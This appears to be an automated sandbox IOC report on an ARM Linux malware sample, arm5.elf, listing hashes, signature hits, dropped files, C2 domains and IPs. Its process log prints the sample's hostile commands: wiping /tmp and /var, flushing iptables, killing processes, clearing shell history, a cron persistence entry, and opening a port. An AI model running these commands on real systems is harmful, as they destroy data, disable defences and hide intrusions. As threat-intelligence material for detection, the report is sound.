Automated Malware Analysis IOC Report for

Files

File Path

Type

Category

Malicious

arm5.elf

ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped

initial sample

Details

Filetype:	ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
Entropy:	5.692308003100198
Filename:	arm5.elf
Filesize:	174816
MD5:	cdac974b2ab6e445d718356feb3a2f73
SHA1:	5c447e7670af022c2bb7b8fb5b3f3aaa4851e0f0
SHA256:	01fd9fb670cd8dedeb43207a633baf548fcba872312aad3e40233a16a305cda7
SHA512:	2bbbc326eac4b866ce139dc1a1f989bb4547760289f20b0cdbb89cf218b94e05f5ff4a1794091b9463e464b3ff475e98178f1186fe8b8fe187c235ac7bda9e6b
SSDEEP:	3072:yjMf9tcOTPX8SJbruAf+6aWfzWG9Ei780eno:yjSteUvuAfraWfqGai7Dp
Preview:	.ELF...a..........(.........4...P.......4. ...(.....................0[..0[...............`...`...`...I..t...........Q.td..................................-...L."...............0@-.\P...0....S.0...P@...0... ....R......0...0...........0... ....R..... 0....S

Signature Hits	Behavior Group	Mitre Attack
Antivirus / Scanner detection for submitted sample	AV Detection
Multi AV Scanner detection for submitted file	AV Detection
Manipulation of devices in /dev	Data Obfuscation
Sample tries to kill multiple processes (SIGKILL)	System Summary	Service Stop
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Sample listens on a socket	Networking
Sample tries to kill a process (SIGKILL)	System Summary
Uses the "uname" system call to query kernel version information (possible evasion)	Malware Analysis System Evasion	Security Software Discovery
Writes shell script file to disk with an unusual file extension	Persistence and Installation Behavior
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)	Malware Analysis System Evasion
URLs found in memory or binary data	Networking

/dev/ocmount

Bourne-Again shell script, ASCII text executable

dropped

Details

File:	/dev/ocmount
Category:	dropped
Dump:	ocmount.86.dr
ID:	dr_0
Target ID:	86
Process:	/tmp/arm5.elf
Type:	Bourne-Again shell script, ASCII text executable
Entropy:	4.026921351476117
Encrypted:	false
Ssdeep:	6:9rd/9GjuZZXegND07aW02vFgWccOHmAyCHOC1A9KiyhlrxleXUEMJJPJHeIHyHi5:rFGjuZog2+WvFgxq6DhllleXRW8ISCuU
Size:	479
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Manipulation of devices in /dev	Data Obfuscation
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Executes the "chmod" command used to modify permissions	Persistence and Installation Behavior	File and Directory Permissions Modification
Sample tries to set the executable flag	Persistence and Installation Behavior	File and Directory Permissions Modification
Writes shell script file to disk with an unusual file extension	Persistence and Installation Behavior

/etc/cron.d/mount.sh

ASCII text

dropped

Details

File:	/etc/cron.d/mount.sh
Category:	dropped
Dump:	mount.sh.92.dr
ID:	dr_1
Target ID:	92
Process:	/bin/sh
Type:	ASCII text
Entropy:	3.8463189626846375
Encrypted:	false
Ssdeep:	3:3P11tKecVLE3Ov:ge7A
Size:	38
Whitelisted:	false
Reputation:	low

Signature Hits	Behavior Group	Mitre Attack
Sample tries to persist itself using cron	Persistence and Installation Behavior
Executes commands using a shell command-line interpreter	Persistence and Installation Behavior	Scripting
Writes crontab like entries to files to /var or /etc typically for achieving persistence	Persistence and Installation Behavior	Scheduled Task/Job

Processes

Path

Cmdline

Malicious

/tmp/arm5.elf

/bin/sh

sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/* /var/log/wtmp"

/bin/sh

/usr/bin/rm

rm -rf /tmp/arm5.elf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/hsperfdata_root /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-OmYV2g /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-timedated.service-McPs7g /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf /var/log/wtmp

/tmp/arm5.elf

/bin/sh

sh -c "rm -rf /tmp/*"

/bin/sh

/usr/bin/rm

rm -rf /tmp/*

/tmp/arm5.elf

/bin/sh

sh -c "iptables -F"

/bin/sh

/usr/sbin/iptables

iptables -F

/tmp/arm5.elf

/bin/sh

sh -c "pkill -9 busybox"

/bin/sh

/usr/bin/pkill

pkill -9 busybox

/tmp/arm5.elf

/bin/sh

sh -c "pkill -9 perl"

/bin/sh

/usr/bin/pkill

pkill -9 perl

/tmp/arm5.elf

/bin/sh

sh -c "pkill -9 python"

/bin/sh

/usr/bin/pkill

pkill -9 python

/tmp/arm5.elf

/bin/sh

sh -c "service iptables stop"

/bin/sh

/usr/sbin/service

service iptables stop

/usr/sbin/service

/usr/bin/basename

basename /usr/sbin/service

/usr/sbin/service

/usr/bin/basename

basename /usr/sbin/service

/usr/sbin/service

/usr/bin/systemctl

systemctl --quiet is-active multi-user.target

/usr/sbin/service

/usr/bin/systemctl

systemctl list-unit-files --full --type=socket

/usr/sbin/service

/usr/bin/sed

sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

/usr/bin/systemctl

systemctl stop iptables.service

/tmp/arm5.elf

/bin/sh

sh -c "/sbin/iptables -F; /sbin/iptables -X"

/bin/sh

/sbin/iptables

/sbin/iptables -F

/bin/sh

/sbin/iptables

/sbin/iptables -X

/tmp/arm5.elf

/bin/sh

sh -c "service firewall stop"

/bin/sh

/usr/sbin/service

service firewall stop

/usr/sbin/service

/usr/bin/basename

basename /usr/sbin/service

/usr/sbin/service

/usr/bin/basename

basename /usr/sbin/service

/usr/sbin/service

/usr/bin/systemctl

systemctl --quiet is-active multi-user.target

/usr/sbin/service

/usr/bin/systemctl

systemctl list-unit-files --full --type=socket

/usr/sbin/service

/usr/bin/sed

sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

/usr/bin/systemctl

systemctl stop firewall.service

/tmp/arm5.elf

/bin/sh

sh -c "history -c"

/tmp/arm5.elf

/bin/sh

sh -c "rm -rf ~/.bash_history"

/bin/sh

/usr/bin/rm

rm -rf /root/.bash_history

/tmp/arm5.elf

/bin/sh

sh -c "history -w"

/tmp/arm5.elf

/bin/sh

sh -c "chmod +x /dev/ocmount"

/bin/sh

/usr/bin/chmod

chmod +x /dev/ocmount

/tmp/arm5.elf

/bin/sh

sh -c "echo '* * * * * root /bin/bash /dev/ocmount' > /etc/cron.d/mount.sh"

/tmp/arm5.elf

/bin/sh

sh -c /dev/ocmount

/bin/sh

/tmp/arm5.elf

/bin/sh

sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/usr/sbin/iptables

iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/bin/sh

sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/bin/busybox

/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/bin/sh

sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/tmp/arm5.elf

/bin/sh

sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/tmp/arm5.elf

/bin/sh

sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/usr/bin/busybox

busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/bin/sh

sh -c "iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/usr/sbin/iptables

iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/bin/sh

sh -c "/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/bin/busybox

/bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/bin/sh

sh -c "/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/tmp/arm5.elf

/bin/sh

sh -c "/usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/tmp/arm5.elf

/bin/sh

sh -c "busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT"

/bin/sh

/usr/bin/busybox

busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT

/tmp/arm5.elf

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-sharing

/usr/libexec/gsd-sharing

/usr/lib/systemd/systemd

/usr/lib/upower/upowerd

/usr/lib/systemd/systemd

/usr/lib/upower/upowerd

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-keyboard

/usr/libexec/gsd-keyboard

/usr/lib/systemd/systemd

/usr/lib/upower/upowerd

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-rfkill

/usr/libexec/gsd-rfkill

/usr/bin/xfce4-panel

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"

/usr/bin/xfce4-panel

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-smartcard

/usr/libexec/gsd-smartcard

/usr/bin/xfce4-panel

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-datetime

/usr/libexec/gsd-datetime

/usr/lib/systemd/systemd

/usr/lib/upower/upowerd

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-media-keys

/usr/libexec/gsd-media-keys

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-screensaver-proxy

/usr/libexec/gsd-screensaver-proxy

/usr/bin/xfce4-panel

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"

/usr/bin/xfce4-panel

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0

/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"

/usr/bin/xfce4-panel

/usr/lib/systemd/systemd

/usr/lib/upower/upowerd

/usr/libexec/gnome-session-binary

/bin/sh

/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-power

/usr/libexec/gsd-power

/usr/lib/udisks2/udisksd

/usr/sbin/dumpe2fs

dumpe2fs -h /dev/sda2

There are 166 hidden processes, click here to show them.

URLs

Name

Malicious

http://Change_ip/octopus_re.sh;chmod

unknown

Domains

Name

Malicious

octopus1337.geek

156.238.224.214

Details

Name:	octopus1337.geek
IP:	156.238.224.214
TargetID:	-1
Active:	true

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Performs DNS lookups	Networking	Application Layer Protocol Non-Application Layer Protocol

IPs

Domain

Country

Malicious

109.202.202.202

unknown

Switzerland

Details

IP:	109.202.202.202
TargetID:	-1
Country:	Switzerland
Countrycode:	CHE
ASN number:	13030
ASN name:	INIT7CH
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

212.118.43.167

unknown

Russian Federation

Details

IP:	212.118.43.167
TargetID:	-1
Country:	Russian Federation
Countrycode:	RUS
ASN number:	25308
ASN name:	CITYLAN-ASRU
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port
Connects to IPs without corresponding DNS lookups	Networking

156.238.224.214

octopus1337.geek

Seychelles

Details

IP:	156.238.224.214
TargetID:	-1
Country:	Seychelles
Countrycode:	SYC
ASN number:	394281
ASN name:	XHOSTSERVERUS
Private:	false
Domain:	octopus1337.geek

Signature Hits	Behavior Group	Mitre Attack
Detected TCP or UDP traffic on non-standard ports	Networking	Non-Standard Port

91.189.91.43

unknown

United Kingdom

Details

IP:	91.189.91.43
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

91.189.91.42

unknown

United Kingdom

Details

IP:	91.189.91.42
TargetID:	-1
Country:	United Kingdom
Countrycode:	GBR
ASN number:	41231
ASN name:	CANONICAL-ASGB
Private:	false

Signature Hits	Behavior Group	Mitre Attack
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)	Networking
Connects to IPs without corresponding DNS lookups	Networking

Memdumps

Base Address

Regiontype

Protect

Malicious

7fc00803d000

page execute read

7fc00803d000

page execute read

7fc10e393000

page read and write

7fc10eb81000

page read and write

7fc108021000

page read and write

55b924699000

page read and write

7fc10f06d000

page read and write

7fc00804f000

page read and write

7fc10ef44000

page read and write

7fc10ed63000

page read and write

7fc10e9f2000

page read and write

7fc10e393000

page read and write

7fc107fff000

page read and write

7fc10e787000

page read and write

7fc10db8b000

page read and write

55b9214c5000

page execute read

7fc10ed63000

page read and write

7fc10f06d000

page read and write

55b92371d000

page execute and read and write

7fc10ef44000

page read and write

7fc10e425000

page read and write

7ffd6a3b5000

page read and write

55b92171f000

page read and write

7fc10e787000

page read and write

55b924699000

page read and write

55b921716000

page read and write

55b92371d000

page execute and read and write

7ffd6a3e9000

page execute read

7fc10ea15000

page read and write

7fc10f0d6000

page read and write

7fc10e9f2000

page read and write

7fc10f091000

page read and write

7fc10db8b000

page read and write

55b9246b9000

page read and write

7fc00804a000

page read and write

7fc10f0d6000

page read and write

7fc108021000

page read and write

7fc10e425000

page read and write

55b923734000

page read and write

7fc10f091000

page read and write

7fc107fff000

page read and write

55b921716000

page read and write

55b9214c5000

page execute read

7fc00804f000

page read and write

7fc10ea15000

page read and write

7ffd6a3b5000

page read and write

7ffd6a3e9000

page execute read

7fc10eb81000

page read and write

7fc008051000

page read and write

55b923734000

page read and write

55b92171f000

page read and write

7fc00804a000

page read and write

There are 42 hidden memdumps, click here to show them.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Report
arm5.elf

Files

Processes

URLs

Domains

IPs

Memdumps

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

IOC Reportarm5.elf

Files

Processes

URLs

Domains

IPs

Memdumps

IOC Report
arm5.elf